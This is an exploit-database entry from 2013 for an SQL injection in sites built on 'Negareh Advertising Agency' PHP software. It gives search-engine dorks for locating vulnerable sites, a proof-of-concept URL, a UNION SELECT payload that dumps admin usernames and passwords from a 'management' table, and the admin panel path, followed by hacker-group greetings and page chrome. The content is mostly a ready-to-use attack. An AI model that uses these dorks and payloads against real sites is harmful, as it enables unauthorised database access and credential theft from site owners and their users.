Negareh Advertising Agency Sql Injection

2013.06.14

Credit: MR.XpR

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:loadNews.php?newsId=

# Exploit Title: Negareh Advertising Agency Sql Injection
# Exploit Author: MR.XpR
# Risk : Normal
# Platforms : PHP
# Tested on: 7 , KAli
# Date : 2013
<------------------------------------------>
# D0rks :
inurl:loadNews.php?newsId=
intext:Powered by Negareh Advertising Agency.
# p0c :
http://wwwXsa.co.ir/loadNews.php?newsId=99%27
# D3mo User and Pass :
http://wwXa.co.ir/loadNews.php?newsId=999+union+select+1,2,3,group_concat%28username,0x3a,password%29,5,6,7,8,9,10,11+from+management
# Admin Pan3l :
http://www.kiXXsa.co.ir/admin/
# Pic Of Injection :
http://uploaXangig.com/Negareh_advertising_Agency_Sql_Injection.jpg
<------------------------------------------>
Greetz : V30Sharp , Moji Rider , Secret.Walker , K3rn3l , Samim.s , Farbod Ezrail , @3is , 3nist3in , Siamak.Black
Greetz : r0bb3r68 , M.R.S.CO , M&#1103;.V3nd3tt4 , N4BIL , Ali_Sedaghat , MR.XHat , vahid4251 , HACKER OF FLOOD & All Member OF IRH

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Negareh Advertising Agency Sql Injection

Dork: inurl:loadNews.php?newsId=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.